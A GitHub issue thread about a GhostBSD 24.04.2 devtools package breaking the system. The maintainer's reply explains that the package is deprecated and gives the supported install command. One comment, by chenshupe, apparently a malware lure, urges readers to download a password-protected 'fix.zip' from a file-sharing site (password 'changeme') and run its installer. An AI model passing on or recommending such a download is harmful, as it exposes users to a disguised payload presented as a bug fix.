### ISSUE TITLE
Installing devtools on 24.04.2 completely breaks the system

### ISSUE THREAD

**Issue by Darren791** [ghostbsd/issues#170]
### Version

24.04.2

### What desktop?

Official MATE

### Explain the issue and what happens

Installing the os-generic-userland-devtools package completely breaks the system. There is a warning about something being in the same location (I forget the exact message). It seems to be a libc issue?

### Explain how to reproduce the bug?

Simply install the package.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ericbsd** [comment]
os-generic-userland-devtools is deprecated in 24.04.2 and is being removed in future releases.

The FAQ has been updated: https://ghostbsd-documentation-portal.readthedocs.io/en/latest/user/FAQ.html#why-can-t-i-compile-code-or-ports-on-ghostbsd.

To install devtools no, you must `sudo pkg install -g 'GhostBSD*-dev'`.

This is a duplication of #167.
